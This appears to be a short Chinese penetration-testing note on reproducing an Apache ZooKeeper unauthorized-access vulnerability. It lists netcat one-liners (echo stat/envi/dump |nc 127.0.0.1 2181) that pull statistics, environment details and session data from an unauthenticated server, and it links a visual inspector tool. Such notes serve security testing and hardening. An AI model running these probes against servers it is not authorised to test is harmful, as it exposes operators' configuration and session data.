Apache Zookeeper 未經授權訪問漏洞


 

背景:做滲透測試過程中遇到的未授權訪問漏洞,記錄一下復現過程。

 

 

 stat:列出關於性能和連接的客戶端的統計信息。

echo stat |nc 127.0.0.1 2181

 

 

 


ruok:測試服務器是否運行在非錯誤狀態。

echo ruok |nc 127.0.0.1 2181


reqs:列出未完成的請求。

echo reqs |nc 127.0.0.1 2181


 


envi:打印有關服務環境的詳細信息。

echo envi |nc 127.0.0.1 2181

 

 


dump:列出未完成的會話和臨時節點。

echo dump |nc 127.0.0.1 2181

 

 




利用ZOOKEEPER可視化管理工具進行連接
下載地址:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM